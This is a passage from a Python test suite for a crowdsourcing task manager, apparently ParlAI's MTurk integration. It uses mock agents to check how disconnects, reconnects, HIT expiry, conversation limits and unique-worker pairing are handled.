first_agent = test_agent_1
second_agent = test_agent_2
mturk_first_agent = mturk_manager_assign_1
mturk_second_agent = mturk_manager_assign_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
mturk_second_agent = mturk_manager_assign_1
mturk_first_agent = mturk_manager_assign_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
# Disconnect the first agent
first_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert partner_disconnects == 1, \
'Connected agent did not receive an inactive_done command'
# Refresh the second agent
second_agent.conversation_id = None
second_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert partner_disconnects == 2, \
'Reconnected agent did not receive an inactive_done command'
# Refresh the first agent
first_agent.conversation_id = None
first_agent.send_alive()
wait_for_state_time(2, mturk_manager)
assert self_disconnects == 1, \
'Disconnected agent did not receive an inactive command'
# Disconnect the second agent
second_agent.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(mturk_second_agent.state.status,
AssignState.STATUS_PARTNER_DISCONNECT)
check_status(mturk_first_agent.state.status,
AssignState.STATUS_DISCONNECT)
assert mturk_manager.completed_conversations == 0, \
'Incomplete conversation marked as complete'
assert mturk_second_agent.disconnected is False, \
'MTurk manager improperly marked the connected agent as disconnected'
assert mturk_first_agent.disconnected is True, \
'MTurk did not mark the disconnected agent as so'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon failure of the ' \
'task, though it should have'
completed_threads[DUO_ONE_DISCONNECT_TEST] = True
def test_count_complete(opt, server_url):
"""Starts two worlds even though only one is requested by using the
count_complete flag.
"""
global completed_threads
print('{} Starting'.format(COUNT_COMPLETE_TEST))
opt['task'] = COUNT_COMPLETE_TEST
opt['count_complete'] = True
opt['num_conversations'] = 1
hit_id = FAKE_HIT_ID.format(COUNT_COMPLETE_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(COUNT_COMPLETE_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(COUNT_COMPLETE_TEST, 2)
last_command = None
message_num_1 = 0
message_num_2 = 0
expected_messages = [TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback_1(packet):
nonlocal last_command
nonlocal message_num_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_1], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_1],
message_num_1,
packet.data['text']
)
message_num_1 += 1
test_agent_1 = \
MockAgent(opt, hit_id, assign_id_1, worker_id_1, task_group_id)
message_handler = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Run through onboarding
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num_1)
test_agent_1.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
# Start the second agent while the first is still waiting
def msg_callback_2(packet):
nonlocal last_command
nonlocal message_num_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num_2], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num_2],
message_num_2,
packet.data['text']
)
message_num_2 += 1
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id_2, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Run through onboarding
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num_2)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
# Finish agent 1's task
test_agent_1.send_message('Hello2', dummy)
test_agent_1.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
# Wait for both to disconnect
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert len(assign_state_1.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert len(assign_state_2.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager.started_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert mturk_manager.completed_conversations == 2, \
'At least one conversation wasn\'t successfully logged'
assert message_num_1 == 2, 'Not all messages were successfully processed'
assert message_num_2 == 2, 'Not all messages were successfully processed'
completed_threads[COUNT_COMPLETE_TEST] = True
def test_expire_hit(opt, server_url):
"""Tests force_expire_hit by creating 4 workers, leaving
one in onboarding and sending 3 to waiting, then ensuring that the
remaining waiting worker gets expired"""
global completed_threads
print('{} Starting'.format(EXPIRE_HIT_TEST))
opt['task'] = EXPIRE_HIT_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(EXPIRE_HIT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(EXPIRE_HIT_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(EXPIRE_HIT_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
last_command_3 = None
last_command_4 = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_3 = packet
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal last_command_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_4 = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
test_agent_3.wait_for_alive()
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_3, mturk_manager)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
check_new_agent_setup(test_agent_4, mturk_manager)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
# Run agent_3 through onboarding
assert test_agent_3.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_3.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_ONBOARDING)
test_agent_3.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(5, mturk_manager)
# Assert that the two other agents were expired
check_status(assign_state_3.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_4.status, AssignState.STATUS_EXPIRED)
assert last_command_3.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Waiting world agent was not expired'
assert last_command_4.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Onboarding world agent was not expired'
test_agent_3.always_beat = False
test_agent_4.always_beat = False
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_4.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.hit_is_expired is True, \
'MTurk manager failed to mark agent as expired'
assert mturk_manager_assign_4.hit_is_expired is True, \
'MTurk manager failed to mark agent as expired'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[EXPIRE_HIT_TEST] = True
def test_allowed_conversations(opt, server_url):
"""Test to ensure that an agent can't take part in two conversations at
the same time when only one concurrent conversation is allowed, but that
they're allowed to start it after finishing the first
"""
global completed_threads
print('{} Starting'.format(ALLOWED_CONVERSATION_TEST))
opt['allowed_conversations'] = 1
opt['num_conversations'] = 2
opt['task'] = ALLOWED_CONVERSATION_TEST
hit_id = FAKE_HIT_ID.format(ALLOWED_CONVERSATION_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 2)
worker_id = FAKE_WORKER_ID.format(ALLOWED_CONVERSATION_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
# Try to connect to second conversation
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish first conversation
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
# Retry second conversation
last_command = None
message_num = 0
test_agent_2.send_alive()
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[ALLOWED_CONVERSATION_TEST] = True
def test_unique_workers_in_conversation(opt, server_url):
"""Ensures that a worker cannot start a conversation with themselves
when not in the sandbox
"""
global completed_threads
print('{} Starting'.format(UNIQUE_CONVERSATION_TEST))
opt['task'] = UNIQUE_CONVERSATION_TEST
opt['is_sandbox'] = False
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(UNIQUE_CONVERSATION_TEST)
worker_id_1 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 1)
worker_id_2 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_1, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_2, assign_id_3)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents for the one worker
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_1, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(3, mturk_manager)
# Ensure no task has started yet
assert test_agent_2.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
check_status(assign_state_2.status, AssignState.STATUS_WAITING)
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Create third agent
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_2, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
elif test_agent_3.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Start heartbeats for 3
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
in_agent = None
in_assign = None
out_assign = None
if assign_state_1.status == AssignState.STATUS_IN_TASK:
in_agent = test_agent_1
in_assign = mturk_manager_assign_1
out_assign = mturk_manager_assign_2
elif assign_state_2.status == AssignState.STATUS_IN_TASK:
out_assign = mturk_manager_assign_1
in_agent = test_agent_2
in_assign = mturk_manager_assign_2
else:
assert False, 'Neither agent moved into the task world'
wait_for_state_time(4, mturk_manager)
assert in_agent.wants_to_send or test_agent_3.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
first_agent = None
second_agent = None
if in_agent.wants_to_send:
first_agent = in_agent
second_agent = test_agent_3
else:
first_agent = test_agent_3
second_agent = in_agent
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(in_assign.state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(in_assign.state.messages))
assert len(assign_state_3.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_3.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert in_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.hit_is_expired is True, \
'Expired HIT was not marked as such'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[UNIQUE_CONVERSATION_TEST] = True
# Map of tests to run to their testing function; running the slowest tests
# first reduces overall runtime
TESTS = {
DUO_NO_ONBOARDING_TEST: test_duo_no_onboarding,
SOLO_ONBOARDING_TEST: test_solo_with_onboarding,
DUO_ONBOARDING_TEST: test_duo_with_onboarding,
EXPIRE_HIT_TEST: test_expire_hit,
DUO_ONE_DISCONNECT_TEST: test_duo_one_disconnect,
DUO_VALID_RECONNECT_TEST: test_duo_valid_reconnects,
UNIQUE_CONVERSATION_TEST: test_unique_workers_in_conversation,
ALLOWED_CONVERSATION_TEST: test_allowed_conversations,
